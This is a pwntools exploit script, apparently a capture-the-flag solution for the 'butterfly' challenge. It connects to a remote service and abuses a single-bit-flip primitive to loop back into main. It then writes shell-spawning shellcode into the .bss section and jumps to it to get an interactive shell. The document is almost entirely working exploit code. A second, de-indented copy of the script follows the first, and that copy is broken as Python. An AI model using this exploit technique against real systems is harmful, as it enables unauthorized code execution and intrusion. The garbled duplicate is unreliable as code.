kokjo/doit_butterfly.py

## doit_butterfly.py
from pwn import *
context(arch="amd64")

e = ELF("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
r = remote("butterfly.pwning.xxx", 9999)
#r = process("./butterfly_33e86bcc2f0a21d57970dc6907867bed")

addr = 0x400860+3
num = (addr << 3) + 6
r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))

def www_b(where, what):
    for i in range(8):
        if what & (1 << i):
            num = (where << 3) + i
            r.recvuntil("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n")
            r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))

def www(where, what):
    for off, c in enumerate(what):
        www_b(where + off, u8(c))

www(e.bss(100), asm(shellcraft.sh()))

r.recvuntil("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n")
r.sendline(str(e.bss(99) << 3).ljust(40)+p64(e.bss(100))) # return to our shellcode

r.clean()

r.interactive()
	from pwn import *
	context(arch="amd64")

	e = ELF("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
	r = remote("butterfly.pwning.xxx", 9999)
	#r = process("./butterfly_33e86bcc2f0a21d57970dc6907867bed")

	addr = 0x400860+3
	num = (addr << 3) + 6
	r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))

	def www_b(where, what):
	for i in range(8):
	if what & (1 << i):
	num = (where << 3) + i
	r.recvuntil("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n")
	r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))

	def www(where, what):
	for off, c in enumerate(what):
	www_b(where + off, u8(c))

	www(e.bss(100), asm(shellcraft.sh()))

	r.recvuntil("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n")
	r.sendline(str(e.bss(99) << 3).ljust(40)+p64(e.bss(100))) # return to our shellcode

	r.clean()

	r.interactive()